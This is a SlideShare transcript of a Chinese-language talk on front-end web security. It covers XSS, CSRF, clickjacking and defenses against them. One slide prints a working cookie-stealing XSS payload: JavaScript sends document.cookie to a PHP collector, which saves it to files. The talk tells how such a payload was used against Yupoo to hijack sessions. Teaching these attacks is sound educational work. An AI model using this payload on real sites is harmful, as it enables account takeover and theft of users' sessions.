安全那些事儿
Upcoming SlideShare
Loading in...5
×
 

安全那些事儿

on

  • 3,048 views

 

Statistics

Views

Total Views
3,048
Views on SlideShare
3,039
Embed Views
9

Actions

Likes
11
Downloads
103
Comments
0

3 Embeds 9

http://kb.corp.56.com 5
http://www.slideshare.net 3
http://www.agglom.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

安全那些事儿 安全那些事儿 Presentation Transcript

  • 安全那些事儿 明城
  • 说些猥琐的话题
  • 严肃点…
  • “ 水手们,安全不是件搞笑的事情”
  • “ 安全第一,文明操作”
  • 国内互联网上约有 1/20000 的页面被感染
  • 浏览器的漏洞使得应用如履薄冰
  • 前端,是数据流的引入者
  • 所以…
  • 前端代码同样可以产生安全问题 前端同样需要关注安全
  • “ 抓稳,咱启航了!”
  • 常见前端攻击方式
  • 我们的航海图
  • XSS , Web 攻击之源
  • XSS 不像 CSS 那么优美 跨站脚本攻击( Cross-site scripting ,通常简称为 XSS )是 一种网站应用程式的安全漏洞攻击,允许恶意使用者将程式码 注入到网页上,其他使用者在观看网页时就会受到影响。
  • 典型的 XSS 注入
  • XSS 的危害 •盗取用户 Cookie •修改页面 DOM •作为其他攻击的跳板 •…
  • 攻击案例 Yupoo 的 XSS 漏洞
  • 攻击原理 用 Yupoo 某处的 XSS 漏洞盗取用户 Cookie 信 息,然后伪造 Cookie 模拟登陆。
  • 船长,发现 XSS 漏洞! 不要小看 alert ,这表明你已经拥有了对这页面的控制权 !
  • 构建“传说中的”攻击脚本 客户端( Javascript ) var img = new Image(); img.src = 'get_cookie.php?var='+encodeURI(document.cookie); 服务器端( PHP ) <?php if (isset($_GET['var'])) { file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var'])); }
  • “ 不是技术问题”的技术问题 事情到这步, 就不仅要看人品,更要看相貌了!
  • 广告过后,马上回来…
  • 船长,“鱼”上钩了! 于是乎,通过这个 XSS 漏洞,我们就获 取到了这家伙的 Cookie 。
  • 接下来的情节,少儿不宜
  • 那么,如何防范 XSS •Filter input,Escape output (过滤输入,转义输出) •严格控制 Cookie 域 •禁用客户端脚本
  • XSS 相关的参考资源 •http://en.wikipedia.org/wiki/Cross-site_scripting •http://www.gracecode.com/Archive/Display/2517 •http://www.gracecode.com/Archive/Display/2491 •http://ha.ckers.org/xss.html •http://www.xssed.com/
  • 咳咳,休息一下…
  • CSRF ,苏醒的巨人
  • 学术化的定义 CSRF ( Cross Site Request Forgery )是伪造 客户端请求的一种攻击,字面上的意思是跨站 点伪造请求。
  • CSRF 的危害 借用被攻击者在目标站点上的权限,进 行不被期望的操作。
  • 攻击案例 饭否的 CSRF 蠕虫攻击 Knownsec Team http://www.knownsec.com
  • 饭否的 CSRF 蠕虫攻击 原理:通过第三方页面 POST 私信给好友, 继而递归的传播。
  • 看片来得凶猛些…
  • 那么,如何防范 CSRF •正确使用 GET 、 POST 和 Cookie •使用 Referer 判断请求来源 •在请求中使用 Security token •妈妈说了,不要打开陌生的链接
  • CSRF 相关的参考资源 •http://en.wikipedia.org/wiki/Cross-site_request_forgery •http://www.cgisecurity.com/csrf-faq.html •http://www.80sec.com/csrf-securit.html •http://www.playhack.net/view.php?id=31
  • 其他攻击方式
  • Clickjacking
  • 蠕虫和钓鱼
  • 冥思
  • “ 噢,船长,我的船长!”
  • 'alert(/tHx/)'.replace(/.+/, eval);